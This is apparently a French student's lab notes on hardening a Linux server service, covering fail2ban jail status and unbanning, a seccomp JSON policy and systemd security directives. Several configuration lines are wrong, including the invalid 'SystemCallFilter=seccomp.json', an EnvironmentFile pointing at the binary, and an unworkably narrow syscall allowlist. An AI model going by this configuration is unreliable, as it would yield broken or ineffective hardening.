Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #1 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #2 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #3 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #4 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #5 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #6 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #7 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #8 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #9 effectuÃ©e...
Erreur de connexion : Impossible de se connecter au serveur distant
Connexion #10 effectuÃ©e...
c'est fini germain!
```

liste des ip ban 


```
sudo fail2ban-client status efrei_server

Status for the jail: efrei_server
|- Filter
|  |- File list: /var/log/efrei_server/server.log
|  |- Currently failed: 3
|  `- Total failed: 10
|- Actions
|  |- Currently banned: 1
|  |- Total banned: 5
|  `- Banned IP list: 192.168.1.11

```
pour deban une ip spécifique
```
sudo fail2ban-client set efrei_server unbanip 192.168.1.11
```
**🌞 Ajouter une politique seccomp au fichier .service**

```
[tom@localhost efreiserveur]$  cd /
[tom@localhost /]$ cd /etc
[tom@localhost etc]$ mkdir efrei_server
mkdir: cannot create directory ‘efrei_server’: Permission denied
[tom@localhost etc]$ sudo mkdir efrei_server
[tom@localhost etc]$ cd /
[tom@localhost /]$ sudo nano /etc/efrei_server/seccomp.json

{
  "defaultAction": "SCMP_ACT_KILL",
  "syscalls": [
    {
      "name": "read",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "write",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "exit",
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "name": "close",
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}


(on exit, ici c'est une politique très restrictive, elle autorise les appels système read, write, exit, et close. )

[tom@localhost /]$ sudo nano /etc/systemd/system/efrei_server.service

(on modifie le file service du service server efrei)

[Unit]
Description=Super serveur EFREI

[Service]
ExecStart=/home/tom/efreiserveur/efrei_server
EnvironmentFile=home/tom/efreiserveur/efrei_server
Environment="LISTEN_ADDRESS=192.168.56.109"
Environment="PORT=8888"
Environment="LOG_DIR=/var/log/efrei_logs"
Restart=always
User=userefrei
Group=userefrei
WorkingDirectory=/home/tom/efreiserveur

#sécurité

RestrictAddressFamilies=AF_INET AF_INET6
NoNewPrivileges=true
ReadOnlyPaths=/home/tom/efreiserveur /var/log/efrei_logs
ProtectSystem=full
ProtectHome=yes
PrivateTmp=yes
SystemCallFilter=seccomp.json  <-------------------



[tom@localhost /]$ sudo systemctl daemon-reload
ctl restart efrei_server
[tom@localhost /]$ sudo systemctl restart efrei_server


```





